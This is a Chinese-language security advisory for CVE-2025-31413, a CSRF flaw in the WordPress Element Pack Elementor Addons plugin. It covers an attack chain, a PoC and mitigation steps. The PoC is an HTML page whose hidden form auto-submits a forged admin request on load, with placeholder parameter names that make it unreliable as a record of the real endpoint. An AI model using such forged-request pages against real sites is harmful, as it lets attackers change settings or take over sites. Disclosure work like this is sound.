CVE-2025-31413 Element Pack Elementor插件跨站请求伪造漏洞

漏洞信息

漏洞编号

CVE-2025-31413

漏洞类型

CSRF (跨站请求伪造)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

bdthemes Element Pack Elementor Addons (bdthemes-element-pack-lite)

漏洞概述

CVE-2025-31413是WordPress插件bdthemes-element-pack-lite（Element Pack Elementor Addons）中的一个跨站请求伪造（CSRF）漏洞。该插件是一款流行的Elementor页面构建器扩展插件，为WordPress网站提供丰富的Elementor小部件和模板功能。漏洞存在于插件的某些功能中，由于缺乏有效的CSRF令牌验证，攻击者可以诱导已登录的管理员用户在不知情的情况下执行非预期的操作。攻击者通过构造恶意网页或链接，利用受害者的浏览器向目标WordPress站点发送已认证的请求，从而在管理员权限下执行诸如修改插件设置、创建恶意管理员账户、植入后门等危险操作。由于WordPress管理后台的会话Cookie会自动随请求发送，攻击者可以在用户不知情的情况下完成身份验证绕过，进而对网站安全造成严重威胁。

技术细节

该CSRF漏洞源于bdthemes-element-pack-lite插件在处理管理操作时未正确实施CSRF防护机制。攻击者利用浏览器的同源策略特性，当管理员访问攻击者控制的恶意页面时，浏览器会自动携带有效的认证Cookie向目标站点发送请求。插件端由于缺少对CSRF令牌的验证，无法区分合法请求与伪造请求。攻击者可以构造包含恶意参数的HTML表单或JavaScript代码，诱导管理员访问后自动提交请求。常见的攻击场景包括：修改插件配置参数、触发特定功能执行、添加恶意内容等。由于WordPress管理员通常拥有最高权限，此类CSRF漏洞可被利用来完全接管网站控制权。

攻击链分析

STEP 1

步骤1

攻击者创建包含恶意表单或JavaScript代码的网页，该页面包含针对目标WordPress站点bdthemes-element-pack-lite插件漏洞端点的自动提交请求

STEP 2

步骤2

攻击者通过钓鱼邮件、社交工程或其他方式诱导目标网站的管理员访问恶意网页

STEP 3

步骤3

受害者的浏览器加载恶意页面后，自动向目标站点发送携带有效管理员认证Cookie的POST请求

STEP 4

步骤4

目标站点的插件收到请求后，由于缺少CSRF令牌验证，将请求视为合法管理操作并执行

STEP 5

步骤5

攻击成功，恶意操作（如修改配置、植入后门等）在管理员不知情的情况下被执行完成

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-31413 -->
<!-- Target: WordPress site with bdthemes-element-pack-lite <= 8.3.13 -->
<!-- This PoC demonstrates a CSRF attack that could trigger plugin actions -->

<!DOCTYPE html>
<html>
<head>
    <title>CSRF PoC - CVE-2025-31413</title>
</head>
<body>
    <h1>CSRF PoC for Element Pack Plugin</h1>
    <p>Click the button below to trigger the CSRF attack:</p>
    
    <!-- Auto-submit form targeting the vulnerable endpoint -->
    <form id="csrfForm" action="http://target-site/wp-admin/admin-post.php" method="POST" style="display:none;">
        <!-- Plugin's vulnerable action parameters -->
        <input type="hidden" name="action" value="element_pack_settings">
        <input type="hidden" name="settings[some_vulnerable_option]" value="malicious_value">
        <input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=element_pack">
    </form>
    
    <script>
        // Auto-submit on page load
        document.getElementById('csrfForm').submit();
    </script>
    
    <p>If you see this message, the request has been sent.</p>
</body>
</html>

影响范围

bdthemes-element-pack-lite <= 8.3.13

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）限制WordPress管理后台访问IP，仅允许可信IP地址访问；2）启用网站安全监控日志，密切关注异常管理操作；3）使用网站应用防火墙过滤可疑请求；4）定期审计管理员账户和权限配置；5）考虑暂时禁用或替换存在漏洞的插件功能。